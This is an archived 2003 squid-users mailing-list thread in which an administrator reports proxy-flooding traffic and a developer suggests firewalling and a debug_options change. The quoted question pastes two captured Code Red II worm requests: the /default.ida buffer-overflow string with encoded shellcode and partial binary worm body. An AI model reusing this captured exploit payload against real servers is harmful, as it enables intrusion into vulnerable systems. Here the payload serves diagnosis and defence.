Re: [squid-users] New Code Red? from Henrik Nordstrom on 2003-04-04 (squid-users)

From: Henrik Nordstrom <hno@dont-contact.us>
Date: 04 Apr 2003 12:53:12 +0200

It is not much that can be done for this kind of problems except to
block the offending client stations by firewalling.

One thing which may make the "400 Bad Request" worse for Squid is that
these also get logged in detail in cache.log. If you cannot firewall the
user then you might want to change debug_options to

debug_options ALL,1 33,0

to temporarily disable most error reporting on client side request
processing.

Regards
Henrik

tor 2003-04-03 klockan 18.02 skrev Wei Keong:
> Hi,
>
> We are seeing a possible new code red. Each victim will flood to a
> particular destination. Unlike the original one, this one does not have
> send proper HTTP method. Although Squid will return Bad Request, this
> attack will consume a lot of resources and bring down the Squid box...
>
> Anybody catches the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411. If this it
> true, is there anyway to deny these requests?
>
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
> 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
> f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Conten
> t-length: 3379 ........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......GlobalAddAtomA
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
> 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.x
> x..Content-type: text/xml.Content-length: 3379 ..Cache-Contr
> ol: max-stale=0........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......Global
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong

-- 
Free Squid-users support provided by Henrik Nordström <hno@squid-cache.org>
PayPal donations welcome if you consider my Free Squid support helpful.
https://www.paypal.com/xclick/business=hno%40squid-cache.org&cn=Comment
If you need commercial Squid support or cost effective Squid and
firewall appliances please refer to MARA Systems AB, Sweden
http://www.marasystems.com/, info@marasystems.com

Received on Fri Apr 04 2003 - 03:53:22 MST

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:40 MST